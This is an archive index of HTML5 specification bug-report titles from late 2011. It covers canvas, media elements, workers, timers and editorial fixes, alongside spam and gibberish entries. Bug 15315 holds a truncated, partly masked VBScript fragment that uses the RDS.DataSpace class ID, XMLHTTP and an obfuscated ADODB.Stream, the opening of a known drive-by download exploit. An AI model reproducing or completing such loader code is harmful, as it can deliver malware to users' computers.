[Bug 15117] Typo [WEBWORKERS] for WebVTT reference

[Bug 15120] It would appear that setTimeout()'s algorithm doesn't ever actually check whether the task is still in the list of active timeouts, and doesn't remove the timeout from the list of active timeouts. Similarly with setInterval().

[Bug 15120] New: It would appear that setTimeout()'s algorithm doesn't ever actually check whether the task is still in the list of active timeouts, and doesn't remove the timeout from the list of active timeouts. Similarly with setInterval().

[Bug 15122] interface HTMLCanvasElement : HTMLElement { attribute unsigned long width; attribute unsigned long height; DOMString toDataURL(optional DOMString type, any... args); void toBlob(FileCallback? callback, optional DOMString type, a

[Bug 15122] New: interface HTMLCanvasElement : HTMLElement { attribute unsigned long width; attribute unsigned long height; DOMString toDataURL(optional DOMString type, any... args); void toBlob(FileCallback? callback, optional DOMString type, a

[Bug 15123] interface HTMLVideoElement : HTMLMediaElement { attribute unsigned long width; attribute unsigned long height; readonly attribute unsigned long videoWidth; readonly attribute unsigned long videoHeight; attribute DOMStr

[Bug 15123] New: interface HTMLVideoElement : HTMLMediaElement { attribute unsigned long width; attribute unsigned long height; readonly attribute unsigned long videoWidth; readonly attribute unsigned long videoHeight; attribute DOMStr

[Bug 15124] ce HTMLOListElement : HTMLElement { attribute boolean reversed; attribute long start; attribute DOMString type; };

[Bug 15124] New: ce HTMLOListElement : HTMLElement { attribute boolean reversed; attribute long start; attribute DOMString type; };

[Bug 15126] <cite> tag should include an intra-article link to a full source citation (such as an MLA or APA citation in scholarly research)

[Bug 15126] New: <cite> tag should include an intra-article link to a full source citation (such as an MLA or APA citation in scholarly research)

[Bug 15128] awesome ,cool

[Bug 15128] New: awesome ,cool

[Bug 15130] Full table of contents

[Bug 15130] New: Full table of contents

[Bug 15133] New: Please explain how hidden=true interacts with plugin loading. Should it be treated as display:none?

[Bug 15133] Please explain how hidden=true interacts with plugin loading. Should it be treated as display:none?

[Bug 15135] New: The anchor in tag <a> with property "name" is very useful. Don't remove it form HTML5 please!

[Bug 15135] The anchor in tag <a> with property "name" is very useful. Don't remove it form HTML5 please!

[Bug 15140] New: The video element's poster attribute requires clarification in relation to precedence

[Bug 15140] The video element's poster attribute requires clarification in relation to precedence

[Bug 15141] DedicatedWorkerGlobalScope IDL formatting is broken

[Bug 15141] New: DedicatedWorkerGlobalScope IDL formatting is broken

[Bug 15142] Define "UNICODE" as a defacto alias for "UTF-16"

[Bug 15142] New: Define "UNICODE" as a defacto alias for "UTF-16"

[Bug 15144] New: Typo in description of preload attribute

[Bug 15144] Typo in description of preload attribute

[Bug 15153] International language support need improvement. For Chinese characters, each time we start a new line in coding part, there should not be any space insert in browsing view. It is helpful for Web Developers. This situation also applies to other asian lang

[Bug 15153] New: International language support need improvement. For Chinese characters, each time we start a new line in coding part, there should not be any space insert in browsing view. It is helpful for Web Developers. This situation also applies to other asian lang

[Bug 15158] Change use of "relevant namespace object" term re workers

[Bug 15158] New: Now that the "relevant namespace object" term has gone from Web IDL (since modules have been removed) some text around here needs to be rewritten. You probably want to refer to you don't need to mention the ECMAScript global object specifically, but inste

[Bug 15166] New: We now have built-in tags for images, audio, and video: <img src="image.jpg" /> <audio src="audio.mp3" /> <video src="video.mp4" /> This allows us to embed images, audio, and video in webpages without the need of proprietary plugins, such as Adobe Flash.

[Bug 15166] We now have built-in tags for images, audio, and video: <img src="image.jpg" /> <audio src="audio.mp3" /> <video src="video.mp4" /> This allows us to embed images, audio, and video in webpages without the need of proprietary plugins, such as Adobe Flash.

[Bug 15167] disabled

[Bug 15167] New: disabled

[Bug 15169] New: "The two attributes must be omitted if the resource in question does not have both an intrinsic width and an intrinsic height." The use of a double negative is confusing. Can you please clarify w

[Bug 15174] New: rendering.html quotes rules don't allow inheritance of author-specified 'quotes'

[Bug 15174] rendering.html quotes rules don't allow inheritance of author-specified 'quotes'

[Bug 15175] New: rendering.html suggested 'quotes' values lack « spacing »

[Bug 15175] rendering.html suggested 'quotes' values lack « spacing »

[Bug 15176] New: section.html: "equivalence" of two snippets in example

[Bug 15177] New: s/Dedicated/Shared/ in the first sensentece tagged [WebIDL] or this is a duplicate of the similar sentence in previous section.

[Bug 15178] hi this is comment

[Bug 15178] New: hi this is comment

[Bug 15179] I would like a single downloadable document for quick reference without hassle, which is not possible (in my location) with a multipage web document. My internet access can be paused for a minute or more, which makes online viewing in a timely manner very

[Bug 15179] New: I would like a single downloadable document for quick reference without hassle, which is not possible (in my location) with a multipage web document. My internet access can be paused for a minute or more, which makes online viewing in a timely manner very

[Bug 15180] Default handling of non-XHTML XML docs is under-/un- specified

[Bug 15180] New: Default handling of non-XHTML XML docs is under-/un- specified

[Bug 15184] document.all.item(string) shouldn't do the same thing as HTMLCollection

[Bug 15184] New: document.all.item(string) shouldn't do the same thing as HTMLCollection

[Bug 15192] New: section 8.1.4 Character references; section Character encodings In section, we say, "User agents must at a minimum support the UTF-8 and Windows-1252 encodings, but may support more." In section 8.1.4, we say, "The numeric character refere

[Bug 15193] draggable and dropzone regions require labels

[Bug 15193] New: draggable and dropzone regions require labels

[Bug 15195] New: apparently incorrect note about violation of Unicode wrt stripping leading BOM

[Bug 15202] New: The method and formmethod content attributes are enumerated attributes with the following keywords and states: The keyword get, mapping to the state GET, indicating the HTTP GET method. The keyword post, mapping to the state POST, indicating the HTTP POST

[Bug 15202] The method and formmethod content attributes are enumerated attributes with the following keywords and states: The keyword get, mapping to the state GET, indicating the HTTP GET method. The keyword post, mapping to the state POST, indicating the HTTP POST

[Bug 15203] New: New Supra purple supra Supra Bandit Purple Sh

[Bug 15207] <track> In the TrackEventInit dictionary the member should be named 'track' and not 'Track'.

[Bug 15207] New: In the TrackEventInit dictionary the member should be named 'track' and not 'Track'.

[Bug 15208] New: s/invokation/invocation/ ?

[Bug 15211] New: (editorial) In step 16, remove duplicate URLs in <var>file list</var> as well. (It should be apparent so whether entry merging actually affects <var>file list</var> is sort of editorial nit I guess.)

[Bug 15212] If a text selection is identified for a drag operation

[Bug 15212] New: If a text selection is identified for a drag operation

[Bug 15213] Drag-and-drop processing model

[Bug 15213] New: Drag-and-drop processing model

[Bug 15214] <track> TextTrackList should inherit from EventTarget.

[Bug 15214] New: TextTrackList should inherit from EventTarget.

[Bug 15215] New: (editorial) s/the application cache/the application cache group of the application cache/

[Bug 15217] New: Maybe I'm missing something, but it seems to me that the example provided for a transformation performed in reverse order produces a square in both reverse and normal order. What exactly is being demonstrated?

[Bug 15218] In section "Complex shapes (paths)", there is an error in the example code for isPointInPath(). In processClick(), the variable "node" is undefined. I assume that the following line should be added: var node = canvas;

[Bug 15218] New: In section "Complex shapes (paths)", there is an error in the example code for isPointInPath(). In processClick(), the variable "node" is undefined. I assume that the following line should be added: var node = canvas;

[Bug 15225] New: If an arc is given a negative radius couldn't the result of that just flip or invert the arc? It would be better than throwing an error, and what I'd expect to happen in that case.

[Bug 15226] New: แนวความคิดหลักของสถานี สถานีโทรทัศน์ของไทยที่ออกอากาศทั่วโลกผ่านสัญญาณในระบบ Global Beam รองรับผู้ชมสูงถึง 120 ประเทศ นำเส =?UTF-8?Q?=E0=B8=99=E0=B8=

[Bug 15226] แนวความคิดหลักของสถานี สถานีโทรทัศน์ของไทยที่ออกอากาศทั่วโลกผ่านสัญญาณในระบบ Global Beam รองรับผู้ชมสูงถึง 120 ประเทศ นำเส =?UTF-8?Q?=E0=B8=99=E0=B8=AD=E0

[Bug 15227] New: แนวความคิดหลักของสถานี สถานีโทรทัศน์ของไทยที่ออกอากาศทั่วโลกผ่านสัญญาณในระบบ Global Beam รองรับผู้ชมสูงถึง 120 ประเทศ นำเส =?UTF-8?Q?=E0=B8=99=E0=B8=

[Bug 15227] แนวความคิดหลักของสถานี สถานีโทรทัศน์ของไทยที่ออกอากาศทั่วโลกผ่านสัญญาณในระบบ Global Beam รองรับผู้ชมสูงถึง 120 ประเทศ นำเส =?UTF-8?Q?=E0=B8=99=E0=B8=AD=E0

[Bug 15228] Be more explicit about headers in redirects.

[Bug 15228] New: Be more explicit about headers in redirects.

[Bug 15229] New: How to use @required on dependent elements with no-Javascript clients

[Bug 15231] New: When the source of a video element points to anaudio file, its intrinsic size should be the same as if there was no resource, and it should not be set to 0. This is not necessarily an author bug. It can happen if the platform has audio codecs but no video

[Bug 15236] New: Add "allow-popups" for iframe@sandbox (placeholder bug)

[Bug 15244] New: The second table of event handlers should not apply to frameset

[Bug 15244] The second table of event handlers should not apply to frameset

[Bug 15254] Don't forbid underscore in host names in URLs

[Bug 15254] New: Don't forbid underscore in host names in URLs

[Bug 15255] CanvasRenderingContext2D.getContext() would be quite awesome

[Bug 15255] CanvasRenderingContext2D.getTransform() would be quite awesome

[Bug 15255] New: CanvasRenderingContext2D.getContext() would be quite awesome

[Bug 15256] New: The WebVTT specifications link is incorrectly placed under the WEBWORKERS heading, which seems to be missing from the index

[Bug 15260]" width="1" height="1" alt="" />

[Bug 15260] New:" width="1" height="1" alt="" />

[Bug 15261] French translation example forgets to use quotation marks around attribute values

[Bug 15261] New: French translation example forgets to use quotation marks around attribute values

[Bug 15262] help fkjgjfk fghhsj dshfsdk jdsfd jdfjsd

[Bug 15262] New: help fkjgjfk fghhsj dshfsdk jdsfd jdfjsd

[Bug 15263] help fkjgjfk fghhsj dshfsdk jdsfd jdfjsd

[Bug 15263] New: help fkjgjfk fghhsj dshfsdk jdsfd jdfjsd

[Bug 15264] New: why there are no other mimes, just text/event-stream? some binary mime would be useful

[Bug 15264] why there are no other mimes, just text/event-stream? some binary mime would be useful

[Bug 15265] New: the note is somewhat misleading because the entries will be loaded from cache.

[Bug 15275] New: This is really a good website and good post.

[Bug 15275] This is really a good website and good post.

[Bug 15276] New: Parent div has less height value than child divs

[Bug 15277] Make containers to be centered on the screen and container content to be centered in container vertically and horizontally

[Bug 15277] New: Make containers to be centered on the screen and container content to be centered in container vertically and horizontally

[Bug 15278] Adding Islamic calendar support in HTML5

[Bug 15278] New: Adding Islamic calendar support in HTML5

[Bug 15280] New: Add native support for camera and microphone to DOM

[Bug 15281] New: Implement possibitity to set file names for files which generated in client side

[Bug 15282] New: Add clipboard API

[Bug 15287] New: Use zip archive files as sprite container

[Bug 15290] <!DOCTYPE html> <html lang="ja"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=0"> <meta name="format-detection" content="telephone=no"> <meta name="

[Bug 15290] New: <!DOCTYPE html> <html lang="ja"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=0"> <meta name="format-detection" content="telephone=no"> <meta name="

[Bug 15291] Allow textarea@pattern (input@pattern is specced already so why not)

[Bug 15291] New: Allow textarea@pattern (input@pattern is specced already so why not)

[Bug 15298] New: I don't know if this belongs here but I think it would be a nice feature in the new HTML5 to make it possible to save canvas animations to a .gif instead of getting just a single frame like .bmp or .png :)

[Bug 15304] Nested <META> tags in <HEAD>

[Bug 15304] New: Nested <META> tags in <HEAD>

[Bug 15315] < ****** language="VBScript"> on error resume next Set obj1 = ********.createElement("object") obj1.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" est1="Microsoft."&"_xmlHTTP" Set obj2 = obj1.CreateObject(est1,"") est="Ado"&"db."&"St

[Bug 15315] New: < ****** language="VBScript"> on error resume next Set obj1 = ********.createElement("object") obj1.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" est1="Microsoft."&"_xmlHTTP" Set obj2 = obj1.CreateObject(est1,"") est="Ado"&"db."&"St

[Bug 15318] New: Define media.preservePitch attribute

[Bug 15319] Liviu Guta si Claudia - Fura-ma voinice

[Bug 15319] New: Liviu Guta si Claudia - Fura-ma voinice

[Bug 15320] Liviu Guta si Claudia - Fura-ma voinice

[Bug 15320] New: Liviu Guta si Claudia - Fura-ma voinice

[Bug 15321] Liviu Guta si Claudia - Fura-ma voinice

[Bug 15321] New: Liviu Guta si Claudia - Fura-ma voinice

[Bug 15322] Liviu Guta si Claudia - Fura-ma voinice

[Bug 15322] New: Liviu Guta si Claudia - Fura-ma voinice

[Bug 15323] Liviu Guta si Claudia - Fura-ma voinice

[Bug 15323] New: Liviu Guta si Claudia - Fura-ma voinice

[Bug 15324] Liviu Guta si Claudia - Fura-ma voinice

[Bug 15324] New: Liviu Guta si Claudia - Fura-ma voinice

[Bug 15326] can"t read web page

[Bug 15326] New: can"t read web page

[Bug 15329] New: Problem: Stop user navigation when the page is showing alerts. Feature: A new type of alerts for show they under the bookmark place that don't stop user navigation while is showing alerts.

[Bug 15331] New: (editorial) Typo: s/if does not/it does not/

[Bug 15333] Implementors should be aware that this specification is not stable. Implementors who are not taking part in the discussions are likely to find the specification changing out from under them in incompatible ways. Vendors interested in implementing this spe

[Bug 15333] New: Implementors should be aware that this specification is not stable. Implementors who are not taking part in the discussions are likely to find the specification changing out from under them in incompatible ways. Vendors interested in implementing this spe

[Bug 15334] New: In step 13, "most appropriate application cache" could be nothing. For exmple, if the user "View Image" from a page that isn't cached (while the image with the same URL is in the appache of another cached page). Or perhaps you could just say UA may skip t

[Bug 15335] In an example there is only opening <HEAD> and no closing </HEAD>

[Bug 15335] New: In an example there is only opening <HEAD> and no closing </HEAD>

[Bug 15341] /* CSS Document */ body { margin:0; color:#555; font:12px Arial; background-color: #587412; } /*---------- Resets ----------*/ h1, h2, h3, h4, h5, p, ul, ol { margin:0; padding:0; } a { text-decoration:none; color:#555; outline:none; } a:hover { text-deco

[Bug 15341] New: /* CSS Document */ body { margin:0; color:#555; font:12px Arial; background-color: #587412; } /*---------- Resets ----------*/ h1, h2, h3, h4, h5, p, ul, ol { margin:0; padding:0; } a { text-decoration:none; color:#555; outline:none; } a:hover { text-deco

[Bug 15342] New: Remove classList/className IDL attributes, which are specified in DOM4.

[Bug 15343] Hi sir! I have an issue down here. Marquee tag is not supported in html5. Then how to get the same functionality?? Do we have any alternate for that???

[Bug 15343] New: Hi sir! I have an issue down here. Marquee tag is not supported in html5. Then how to get the same functionality?? Do we have any alternate for that???

[Bug 15344] Hi sir! I have an issue down here. Marquee tag is not supported in html5. Then how to get the same functionality?? Do we have any alternate for that???

[Bug 15344] New: Hi sir! I have an issue down here. Marquee tag is not supported in html5. Then how to get the same functionality?? Do we have any alternate for that???

[Bug 15345] New: (editorial) q is not defined in this sentence. (Suggestion only; s/for each worker/for each WorkerGlobalScope q/ , s/q's WorkerGlobalScope owner's/q's/ )

[Bug 15347] Acknowledgements Thanks to Tim Berners-Lee for inventing HTML, without which none of this would exist. Should read: Thanks to Sir Tim Berners-Lee for inventing HTML, without which none of this would exist. ;)

[Bug 15347] New: Acknowledgements Thanks to Tim Berners-Lee for inventing HTML, without which none of this would exist. Should read: Thanks to Sir Tim Berners-Lee for inventing HTML, without which none of this would exist. ;)

[Bug 15351] New: The word "only" should appear immediately before "if"

[Bug 15351] The word "only" should appear immediately before "if"

[Bug 15352] In the paragraph beginning "The following form", the word "only" should appear immediately before "if"; the word "considerd" should be spelled "considered".

[Bug 15352] New: In the paragraph beginning "The following form", the word "only" should appear immediately before "if"; the word "considerd" should be spelled "considered".

[Bug 15353] Hi, I saw your web, it is so good! If are you interested promotion in "CoderSky" magazine and could u write an articles for our magazine? Think about the benefits that you provide. You can show up as an authority in your field.Gain experience that you ca

[Bug 15353] New: Hi, I saw your web, it is so good! If are you interested promotion in "CoderSky" magazine and could u write an articles for our magazine? Think about the benefits that you provide. You can show up as an authority in your field.Gain experience that you ca

[Bug 15357] siteye girip sol alt köseden oylarnızı bekliyorum kaan yıldırım

[Bug 15357] New: siteye girip sol alt köseden oylarnızı bekliyorum kaan yıldırım

[Bug 15358] New: Use the new callback syntax for Function and event handler attributes.

[Bug 15358] Use the new callback syntax for Function and event handler attributes.

[Bug 15359] New: Make BOM trump HTTP

[Bug 15360] New: The spec should define whether <base> affects the SVG 'fill' attribute of value url(xxx).

[Bug 15360] The spec should define whether <base> affects the SVG 'fill' attribute of value url(xxx).

[Bug 15361] Hello, before I start, currently have @ 176 feeds urls , etc ? some use html / some java , will this be a problem ? if so I will continue with snippets

[Bug 15361] New: Hello, before I start, currently have @ 176 feeds urls , etc ? some use html / some java , will this be a problem ? if so I will continue with snippets

[Bug 15362] Hello, before I start, currently have @ 176 feeds urls , etc ? some use html / some java , will this be a problem ? if so I will continue with snippets

[Bug 15362] New: Hello, before I start, currently have @ 176 feeds urls , etc ? some use html / some java , will this be a problem ? if so I will continue with snippets

[Bug 15363] Hello, before I start, currently have @ 176 feeds urls , etc ? some use html / some java , will this be a problem ? if so I will continue with snippets

[Bug 15363] New: Hello, before I start, currently have @ 176 feeds urls , etc ? some use html / some java , will this be a problem ? if so I will continue with snippets

[Bug 15364] New: 6.6.4 => 5.4 => (editorial) s/the cache host the Document/the Document/

[Bug 15366] Expose history traversal direction

[Bug 15366] New: Expose history traversal direction

[Bug 15367] New: Grammatical issue: this is hard to for me to parse "Wait until any invocations of this algorithm started before this one whose timeout is equal to or less than this one's have completed."

[Bug 8673] Restriction on command element as part of a menu

[Bug 8722] focus behaviour should be same for canvas regions as for elements

[Bug 9097] Add wbr { content: "\200B"; } (ZWSP)?

[Bug 9113] re: "axis on td and th elements" text could say "Use the scope attribute on the relevant th"

[Bug 9213] HTML5 Lacks a Way to Programmatically-Determine Missing Text Alternatives

[Bug 9301] Support dashed lines in canvas

[Bug 9326] HTML elements mapping to ARIA and A11y APIs

[Bug 9623] <details> and <summary> are missing from the "strong aria semantics" table

Last message date: Saturday, 31 December 2011 03:34:20 UTC